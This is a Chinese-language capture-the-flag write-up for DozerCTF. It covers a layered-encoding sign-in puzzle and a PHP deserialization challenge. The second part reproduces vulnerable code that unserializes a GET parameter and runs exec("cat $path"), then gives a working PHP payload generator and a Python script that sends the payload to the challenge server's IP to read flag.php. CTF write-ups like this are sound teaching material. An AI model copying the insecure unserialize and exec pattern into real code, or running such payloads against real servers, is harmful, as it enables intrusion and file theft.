DOZERCTF 反序列化和签到wp

------------恢复内容开始------------

1、签到题

　　exe文件打不开，然后我用记事本打开发现是一串字符，

R00yVE1NWlRIRTJFRU5CWUdVM1RNUlJURzRaVEtOUllHNFpUTU9CV0lJM0RRTlJXRzQ0VE9OSlhHWTJET05aUkc1QVRPTUJUR0kyRUVNWlZHNDNUS05aWEc0MlRHTkpaR1pBVElNUldHNDNUT05KVUc0M0RPTUJXR0kyRUtOU0ZHTTRUT09CVUc0M0VFPT09Cgo=

　　看到后面的等于号我就直接用base64解密，还是得到一串等于号结尾的字符串，继续用base64解解不出来，然后用base32解出来了

3563394B48576F37356873686B686679757647717A70324B3577577753596A426777547670624E6E3978476B

　　怀疑是hex加密，然后hex解密

5c9KHWo75hshkhfyuvGqzp2K5wWwSYjBgwTvpbNn9xGk

　　然后就卡住了，被大佬提醒是base58加密，

进行base58解密得出flag：

Dozerctf{base_family_is_so_good}

　　

 2、反序列化题

　　这道题确实是白给的

if ($_GET['path']) {
    $path = @$_GET['path'];
    unserialize($path);
} else {
    highlight_file(__FILE__);

}

　　直接插入反序列化的值没有设卡

class home
{
    private $method;
    private $args;
    function __construct($method, $args)
    {
        $this->method = $method;
        $this->args = $args;
    }

    function __destruct()
    {
        if (in_array($this->method, array("mysys"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }

    function mysys($path)
    {
        print_r(base64_encode(exec("cat $path")));
    }
    function waf($str)
    {
        if (strlen($str) > 8) {
            die("No");
        }
        return $str;
    }

    function __wakeup()
    {
        $num = 0;
        foreach ($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
            $num += 1;
            if ($num > 2) {
                die("No");
            }
        }
    }
}

　　这到题主要就是绕过：in_array($this->method, array("mysys"))和__wakeup

其实第一个都不用绕过，直接上exp:

<?
class home
{
    private $method;
    private $args;
    function __construct($method, $args)
    {
        $this->method = $method;
        $this->args = $args;
        // print_r(array($this, $this->method));
    }

    function __destruct()
    {
        if (in_array($this->method, array("mysys"))) {
            call_user_func_array(array($this, $this->method), $this->args);
            // echo 1;
        }
    }

    function mysys($path)
    {
        print_r(base64_encode(exec("cat $path")));
    }
    function waf($str)
    {
        if (strlen($str) > 8) {
            die("No");
        }
        return $str;
    }

    function __wakeup()
    {
        $num = 0;
        foreach ($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
            $num += 1;
            if ($num > 2) {
                die("No");
            }
        }
    }
}

$b = array('flag.php');
$a =new home('mysys',$b);
$a = serialize($a);

echo base64_encode($a);

我本来是想直接用get方式传上去的但是试了几次没用我就改用python传了

import base64
import requests
url = 'http://118.31.11.216:30600/'
php = base64.b64decode('Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NToibXlzeXMiO3M6MTA6IgBob21lAGFyZ3MiO2E6MTp7aTowO3M6ODoiZmxhZy5waHAiO319')
# print(php)
data = {'path':php}
r = requests.get(url,params=data)
print(r.text)

　　这flag差不多就出来了